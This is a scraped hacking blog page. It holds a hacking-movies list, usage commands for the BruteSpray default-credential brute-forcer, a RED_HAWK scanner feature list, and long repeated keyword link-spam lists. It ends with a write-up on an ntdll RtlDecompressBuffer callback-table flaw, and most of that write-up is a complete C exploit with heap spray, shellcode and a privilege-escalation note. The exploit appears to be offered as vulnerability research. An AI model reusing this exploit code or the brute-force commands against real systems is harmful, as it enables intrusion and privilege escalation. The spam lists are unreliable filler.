Monday, August 31, 2020

TOP 10 HACKING MOVIES YOU SHOULD WATCH

Technology and hacking gave a new horizon to the science fiction movies. As hacking is getting common and every online thing is at risk whether it's 10% or 90%, not a system is 100% secure over the internet. Every day new security holes are getting discovered. So, now most of the sci-fi movies have the tech and hack stuff to grow awareness in everybody's mind about the online privacy and risk to their information. Here I am sharing top 10 hacking movies that worth a watch.

TOP 10 HACKING MOVIES

Here I have listed top 10 hacking movies that you should watch.

1. HACKERS (1995)

In Hackers, Angelina Jolie and Jonny Lee Miller portray two youthful and hip hackers. Miller portrays a hacker who got caught as a very young child at an age of 11 years after crashing thousands of computers and has been sentenced to zero computer access until his 18th birthday.

2. LIVE FREE OR DIE HARD (2007)

Live Free or Die Hard (also known as Die Hard 4 and released as Die Hard 4.0 outside North America) is a 2007 American action film, and the fourth in the Die Hard film series depicts a scenario where a hacker played by Timothy Olyphant (of Justified fame) takes down nearly the entire U.S. infrastructure in an attempt to transfer trillions of dollars from the Federal Reserve to his account. This movie gives a complete idea of how actually these blackhat hackers operate.

3. EAGLE EYE (2008)

In this movie, two people get a call from an unknown number by a woman. They get a task on the phone that if they don't follow the phone call they would die. This movie displays supercomputer hack on all networks and military networks. This is just an amazing movie on how artificial intelligence computer hacks our real life for bad motives.

4. ALGORITHM (2014)

The film 'Algorithm' tracks the travails of Will, who is the freelance computer hacker who hacks into a top-secret government contractor agency and downloads all their recently developed programs." You can see the full movie below

5. WARGAMES (1983)

The film features David Lightman (Broderick), a young high school student hacker who accidentally hacks into a military supercomputer and starts the countdown to World War III.

6. THE MATRIX (1999)

This is one of the greatest science fiction movies. In this movie, reality, as perceived by most humans, is actually a simulated reality called "the Matrix", created by machines to subdue the human population, while their bodies' heat and electrical activity are used as an energy source.
A character named "Neo", who is a computer Hacker, learns this truth and is drawn into a rebellion against the machines, which involves other people who have been freed from the "dream world". The Matrix franchise is a trilogy movie series.

7. TAKEDOWN (2000)

This movie is based on famous computer U.S. hacker Kevin David Mitnick. Based upon the book and written by his nemesis, Tsutomu Shimomura, the story tends to glorify Shimomura. Mitnick operated in the 1980s and '90s and eventually went to prison for a couple of years. Now, he is a highly paid IT security consultant, speaker, and writer.

8. BLACKHAT (2015)

Blackhat is newly released movie by Chris Hemsworth. In this movie, hackers hack the Chinese nuclear power plant to start a nuclear reaction. Simultaneously, they also hack the stock exchange and steal millions of dollars from the bank. This movie shows how a black hat hackers threaten governments.

9. THE ITALIAN JOB (2003)

Although the MINI Coopers are really the stars of The Italian Job (a remake of the 1969 film of the same name), Seth Green plays Lyle, a hacker among a group of elite thieves, who is able to manipulate traffic signals, among other devices, that make this grand theft possible.

10. UNTRACEABLE (2008)

This film involves a serial killer who rigs contraptions that kill his victims based on the number of hits received by a website KillWithMe.com that features a live streaming video of the victim. Millions of people log on, hastening the victims' deaths.

There may be more exciting hacking movies but I found these top 10 hacking movies that you should watch for once.
You can also find out the top 5 most dangerous hackers in the real world living.
Related posts

Sunday, August 30, 2020

BruteSpray: A Brute-forcer From Nmap Output And Automatically Attempts Default Creds On Found Services


About BruteSpray: BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.

BruteSpay's Installation
   With Debian users, the only thing you need to do is this command:
sudo apt install brutespray

   For Arch Linux user, you must install Medusa first: sudo pacman -S medusa

   And then, enter these commands to install BruteSpray:


Supported Services: ssh, ftp, telnet, vnc, mssql, mysql, postgresql, rsh, imap, nntpp, canywhere, pop3, rexec, rlogin, smbnt, smtp, svn, vmauthdv, snmp.

How to use BruteSpray?

   First do an Nmap scan with -oG nmap.gnmap or -oX nmap.xml.
   Command: python3 brutespray.py -h
   Command: python3 brutespray.py --file nmap.gnmap
   Command: python3 brutesrpay.py --file nmap.xml
   Command: python3 brutespray.py --file nmap.xml -i

   You can watch more details here:

Examples

   Using Custom Wordlists:
python3 brutespray.py --file nmap.gnmap -U /usr/share/wordlist/user.txt -P /usr/share/wordlist/pass.txt --threads 5 --hosts 5

   Brute-Forcing Specific Services:
python3 brutespray.py --file nmap.gnmap --service ftp,ssh,telnet --threads 5 --hosts 5

   Specific Credentials:
python3 brutespray.py --file nmap.gnmap -u admin -p password --threads 5 --hosts 5

   Continue After Success:
python3 brutespray.py --file nmap.gnmap --threads 5 --hosts 5 -c

   Use Nmap XML Output:
python3 brutespray.py --file nmap.xml --threads 5 --hosts 5

   Use JSON Output:
python3 brutespray.py --file out.json --threads 5 --hosts 5

   Interactive Mode: python3 brutespray.py --file nmap.xml -i

Data Specs
{"host":"127.0.0.1","port":"3306","service":"mysql"}
{"host":"127.0.0.10","port":"3306","service":"mysql"}
...


Changelog: Changelog notes are available at CHANGELOG.md.

You might like these similar tools:

More information


  1. Pentest Tools For Mac
  2. Hacker Tools For Windows
  3. Pentest Tools Port Scanner
  4. What Is Hacking Tools
  5. Top Pentest Tools
  6. Pentest Tools Port Scanner
  7. Hacker Tools 2020
  8. Pentest Tools Url Fuzzer
  9. Hack Apps
  10. Hacker Tools Free Download
  11. Hacker Tools Linux
  12. Pentest Tools Free
  13. Hack Tools Github
  14. Nsa Hacker Tools
  15. Pentest Tools Bluekeep
  16. New Hacker Tools
  17. Hacking Tools For Games
  18. Hacker Tools Hardware
  19. Pentest Tools Open Source
  20. Tools 4 Hack
  21. Pentest Tools Framework
  22. Hack Tools For Games
  23. Best Hacking Tools 2019
  24. Easy Hack Tools
  25. Hacker Tools Github
  26. Pentest Tools
  27. Best Pentesting Tools 2018
  28. Hack Tools For Mac
  29. Pentest Tools Online
  30. Hacker Tools For Windows
  31. Pentest Tools Linux
  32. Install Pentest Tools Ubuntu
  33. Hacker Tools Mac
  34. Hack Rom Tools
  35. Easy Hack Tools
  36. Hack Tool Apk
  37. Hacker Tools 2019
  38. Android Hack Tools Github
  39. Hacker Tools 2020
  40. Hacker Tools Online
  41. How To Make Hacking Tools
  42. Wifi Hacker Tools For Windows
  43. How To Hack
  44. Hackers Toolbox
  45. Hacker Tools Free
  46. Hacking Tools Github
  47. What Is Hacking Tools
  48. Pentest Tools
  49. Nsa Hack Tools
  50. Hack Tools Mac
  51. Hacking Tools Windows 10
  52. Hacking Tools For Windows 7
  53. Hack Tools Online
  54. Hacker Tools For Ios
  55. What Are Hacking Tools
  56. Pentest Tools For Android
  57. Pentest Tools List
  58. Hack App
  59. Hacker Security Tools
  60. Hacker Tools Free
  61. Nsa Hack Tools Download
  62. Hacker Tools For Ios
  63. Hacker Tools 2020
  64. Hacker Hardware Tools
  65. Hacker Tools
  66. Hack Apps
  67. Top Pentest Tools
  68. Pentest Tools Linux
  69. Hack Website Online Tool
  70. Hack And Tools
  71. Pentest Tools Website Vulnerability
  72. Pentest Tools Android
  73. Hacker Tools For Pc
  74. Pentest Tools Framework
  75. Kik Hack Tools
  76. Hacker
  77. Hack App
  78. Pentest Tools Linux
  79. Hacker Tools Online

RED_HAWK: An Information Gathering, Vulnerability Scanning And Crawling Tool For Hackers


About RED_HAWK: RED_HAWK is a all in one tool for Information Gathering, Vulnerability Scanning and Crawling. A must have tool for all pentesters and hackers.

RED_HAWK's features:
  • Basic ScanSite Title (NEW):
       IP Address
       Web Server Detection IMPROVED
       CMS Detection
       Cloudflare Detection
       robots.txt Scanner
  • Whois Lookup (IMPROVED)
  • Geo-IP Lookup
  • Grab Banners IMPROVED
  • DNS Lookup
  • Subnet Calculator
  • Nmap Port Scan
  • Sub-Domain Scanner IMPROVED:
       Sub Domain
       IP Address
  • Reverse IP Lookup and CMS Detection IMPROVED:
       Hostname
       IP Address
       CMS
  • Error Based SQLi Scanner
  • Bloggers View NEW
       HTTP Response Code
       Site Title
       Alexa Ranking
       Domain Authority
       Page Authority
       Social Links Extractor
       Link Grabber
  • WordPress Scan NEW
       Sensitive Files Crawling
       Version Detection
       Version Vulnerability Scanner
  • Crawler
  • MX Lookup NEW
  • Scan For Everything - The Old Lame Scanner
List of CMS Supported on RED_HAWK
   RED_HAWK's CMS Detector currently is able to detect the following CMSs (Content Management Systems) in case the website is using some other CMS, Detector will return could not detect.
  • WordPress
  • Joomla
  • Drupal
  • Magento

RED_HAWK Installation
   How To Configure RED HAWK with moz.com for Bloggers View Scan?
   All set, now you can enjoy the bloggers view.

How to use RED_HAWK?

Known Issues of RED_HAWK
   ISSUE: Scanner Stops Working After Cloudflare Detection!
   SOLUTION: Use the fix command (for Debian-based distros) or manually install php-curl and php-xml.

   Watch the video to see how to solve that isuue:

Support and Donations
   Found RED_HAWK cool? Well you could buy a cup of tea for the author 😉 Just send any amount of donations (in Bitcoin) to this address: 1NbiQidWWVVhWknsfPSN1MuksF8cbXWCku

   Can't donate? well that's no problem just drop a "THANK YOU, AUTHOR" this will motivate me to create more exciting stuffs for you 😉

TODOs for RED_HAWK:
  • Make a proper update option ( Installs current version automatically )
  • Add more CMS to the detector
  • Improve The WordPress Scanner ( Add User, Theme & Plugins Enumeration )
  • Create a web version of the scanner
  • Add XSS & LFI Scanner
  • Improve the Links grabber thingy under bloggers view
  • Add some other scans under the Bloggers View



More information
  1. Hacking Tools
  2. Hacker Tools Online
  3. Wifi Hacker Tools For Windows
  4. Top Pentest Tools
  5. Nsa Hack Tools
  6. Hacking Tools And Software
  7. Hacker Tools List
  8. What Are Hacking Tools
  9. Hacker Tools Online
  10. Hacker Tools Online
  11. Hack Apps
  12. Hacking Tools For Pc
  13. Hacker Tools 2020
  14. Pentest Tools Download
  15. Pentest Recon Tools
  16. Pentest Tools Alternative
  17. Hacker Tools Online
  18. Hacker Tools Free
  19. Hack Tools 2019
  20. Hacking Tools Hardware
  21. Hacker Tools 2019
  22. Hack Apps
  23. Hacker Tool Kit
  24. Pentest Tools Windows
  25. Nsa Hack Tools
  26. Kik Hack Tools
  27. Wifi Hacker Tools For Windows
  28. Pentest Recon Tools
  29. Hacker Tools 2019
  30. Hacking Tools Download
  31. Ethical Hacker Tools
  32. Hacking Tools For Beginners
  33. Beginner Hacker Tools
  34. Pentest Tools Website
  35. What Are Hacking Tools
  36. What Are Hacking Tools
  37. Hacker
  38. Free Pentest Tools For Windows
  39. Black Hat Hacker Tools
  40. Hack Tools
  41. Hackrf Tools
  42. What Are Hacking Tools
  43. Black Hat Hacker Tools
  44. Hack And Tools
  45. New Hack Tools
  46. Black Hat Hacker Tools
  47. Best Hacking Tools 2019
  48. Computer Hacker
  49. Android Hack Tools Github
  50. Hack Tools For Pc
  51. Hacker Tools Windows
  52. Hacker Tools For Ios
  53. Hacking Tools For Games
  54. Hacking Tools For Windows 7
  55. Hacking Tools And Software
  56. Pentest Tools Download
  57. Hacker Security Tools
  58. Pentest Tools Apk
  59. Pentest Tools Online
  60. Hacker Tools Software
  61. Pentest Tools Review
  62. Hacking Tools For Windows
  63. Hack Tool Apk
  64. Hacker Tools Github
  65. Hack Tool Apk
  66. How To Hack
  67. Hackrf Tools
  68. Hack Tools For Ubuntu
  69. Hacker Tools Hardware
  70. Hacker Tools Apk
  71. Hack Tools
  72. Hack Tools For Windows
  73. Underground Hacker Sites
  74. Hack Tools Pc
  75. Hack Tool Apk
  76. Termux Hacking Tools 2019
  77. Hack Tools Pc
  78. Pentest Tools List
  79. Hack Tools For Ubuntu
  80. Hacking Tools For Games
  81. Hack App
  82. Hackrf Tools
  83. Hack And Tools
  84. Best Hacking Tools 2020
  85. What Is Hacking Tools
  86. Hacker Tools Windows
  87. Hacker Tool Kit
  88. Hacking Tools For Windows
  89. Beginner Hacker Tools
  90. Hack Tools
  91. World No 1 Hacker Software
  92. Physical Pentest Tools
  93. Pentest Tools Alternative
  94. Hacking Tools Software
  95. Hacking Tools Windows 10
  96. Hacking Tools Online
  97. Hacker Tools Mac
  98. Pentest Tools Kali Linux
  99. Usb Pentest Tools
  100. Hacking Tools Online
  101. Hacker Hardware Tools
  102. Hacker Techniques Tools And Incident Handling
  103. New Hack Tools
  104. Pentest Tools For Android
  105. Hack Rom Tools
  106. What Are Hacking Tools
  107. Hack Tools Pc
  108. Computer Hacker
  109. Free Pentest Tools For Windows
  110. How To Install Pentest Tools In Ubuntu
  111. Hack Tools Online
  112. Hacking Tools And Software
  113. Bluetooth Hacking Tools Kali
  114. Android Hack Tools Github
  115. Hacking Tools Hardware
  116. Hacking Tools For Windows 7
  117. Hacking Tools For Mac

RtlDecompresBuffer Vulnerability

Introduction

The RtlDecompressBuffer is a WinAPI implemented on ntdll that is often used by browsers and applications and also by malware to decompress buffers compressed on LZ algorithms for example LZNT1.

The first parameter of this function is a number that represents the algorithm to use in the decompression, for example the 2 is the LZNT1. This algorithm switch is implemented as a callback table with the pointers to the algorithms, so the boundaries of this table must be controlled for avoiding situations where the execution flow is redirected to unexpected places, specially controlled heap maps.

The algorithms callback table







Notice the five nops at the end probably for adding new algorithms in the future.

The way to jump to this pointers depending on the algorithm number is:
call RtlDecompressBufferProcs[eax*4]

The bounrady checks

We control eax because is the algorithm number, but the value of eax is limited, let's see the boudary checks:


int  RtlDecompressBuffer(unsigned __int8 algorithm, int a2, int a3, int a4, int a5, int a6)
{
int result; // eax@4

if ( algorithm & algorithm != 1 )
{
if ( algorithm & 0xF0 )
result = -1073741217;
else
result = ((int (__stdcall *)(int, int, int, int, int))RtlDecompressBufferProcs[algorithm])(a2, a3, a4, a5, a6);
}
else
{
result = -1073741811;
}
return result;
}

Regarding that decompilation seems that we can only select algorithm number from 2 to 15, regarding that  the algorithm 9 is allowed and will jump to 0x90909090, but we can't control that addess.



let's check the disassembly on Win7 32bits:

  • the movzx limits the boundaries to 16bits
  • the test ax, ax avoids the algorithm 0
  • the cmp ax, 1 avoids the algorithm 1
  • the test al, 0F0h limits the boundary .. wait .. al?


Let's calc the max two bytes number that bypass the test al, F0h

unsigned int max(void) {
        __asm__("xorl %eax, %eax");
        __asm__("movb $0xff, %ah");
        __asm__("movb $0xf0, %al");
}

int main(void) {
        printf("max: %u\n", max());
}

The value is 65520, but the fact is that is simpler than that, what happens if we put the algorithm number 9? 



So if we control the algorithm number we can redirect the execution flow to 0x55ff8890 which can be mapped via spraying.

Proof of concept

This exploit code, tells to the RtlDecompresBuffer to redirect the execution flow to the address 0x55ff8890 where is a map with the shellcode. To reach this address the heap is sprayed creating one Mb chunks to reach this address.

The result on WinXP:

The result on Win7 32bits:


And the exploit code:

/*
ntdll!RtlDecompressBuffer() vtable exploit + heap spray
by @sha0coder

*/

#include
#include
#include

#define KB 1024
#define MB 1024*KB
#define BLK_SZ 4096
#define ALLOC 200
#define MAGIC_DECOMPRESSION_AGORITHM 9

// WinXP Calc shellcode from http://shell-storm.org/shellcode/files/shellcode-567.php
/*
unsigned char shellcode[] = "\xeB\x02\xBA\xC7\x93"
"\xBF\x77\xFF\xD2\xCC"
"\xE8\xF3\xFF\xFF\xFF"
"\x63\x61\x6C\x63";
*/

// https://packetstormsecurity.com/files/102847/All-Windows-Null-Free-CreateProcessA-Calc-Shellcode.html
char *shellcode =
"\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
"\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
"\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
"\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
"\x57\x78\x01\xc2\x8b\x7a\x20\x01"
"\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
"\x45\x81\x3e\x43\x72\x65\x61\x75"
"\xf2\x81\x7e\x08\x6f\x63\x65\x73"
"\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
"\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
"\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
"\xb1\xff\x53\xe2\xfd\x68\x63\x61"
"\x6c\x63\x89\xe2\x52\x52\x53\x53"
"\x53\x53\x53\x53\x52\x53\xff\xd7";


PUCHAR landing_ptr = (PUCHAR)0x55ff8b90; // valid for Win7 and WinXP 32bits

void fail(const char *msg) {
printf("%s\n\n", msg);
exit(1);
}

PUCHAR spray(HANDLE heap) {
PUCHAR map = 0;

printf("Spraying ...\n");
printf("Aproximating to %p\n", landing_ptr);

while (map < landing_ptr-1*MB) {
map = HeapAlloc(heap, 0, 1*MB);
}

//map = HeapAlloc(heap, 0, 1*MB);

printf("Aproximated to [%x - %x]\n", map, map+1*MB);


printf("Landing adddr: %x\n", landing_ptr);
printf("Offset of landing adddr: %d\n", landing_ptr-map);

return map;
}

void landing_sigtrap(int num_of_traps) {
memset(landing_ptr, 0xcc, num_of_traps);
}

void copy_shellcode(void) {
memcpy(landing_ptr, shellcode, strlen(shellcode));

}

int main(int argc, char **argv) {
FARPROC RtlDecompressBuffer;
NTSTATUS ntStat;
HANDLE heap;
PUCHAR compressed, uncompressed;
ULONG compressed_sz, uncompressed_sz, estimated_uncompressed_sz;

RtlDecompressBuffer = GetProcAddress(LoadLibraryA("ntdll.dll"), "RtlDecompressBuffer");

heap = GetProcessHeap();

compressed_sz = estimated_uncompressed_sz = 1*KB;

compressed = HeapAlloc(heap, 0, compressed_sz);

uncompressed = HeapAlloc(heap, 0, estimated_uncompressed_sz);


spray(heap);
copy_shellcode();
//landing_sigtrap(1*KB);
printf("Landing ...\n");

ntStat = RtlDecompressBuffer(MAGIC_DECOMPRESSION_AGORITHM, uncompressed, estimated_uncompressed_sz, compressed, compressed_sz, &uncompressed_sz);

switch(ntStat) {
case STATUS_SUCCESS:
printf("decompression Ok!\n");
break;

case STATUS_INVALID_PARAMETER:
printf("bad compression parameter\n");
break;


case STATUS_UNSUPPORTED_COMPRESSION:
printf("unsuported compression\n");
break;

case STATUS_BAD_COMPRESSION_BUFFER:
printf("Need more uncompressed buffer\n");
break;

default:
printf("weird decompression state\n");
break;
}

printf("end.\n");
}

The attack vector
This API is called very often in the windows system, and also is called by browsers, but he attack vector is not common, because the apps that call this API trend to hard-code the algorithm number, so in a normal situation we don't control the algorithm number. But if there is a privileged application service or a driver that let to switch the algorithm number, via ioctl, config, etc. it can be used to elevate privileges on win7

More articles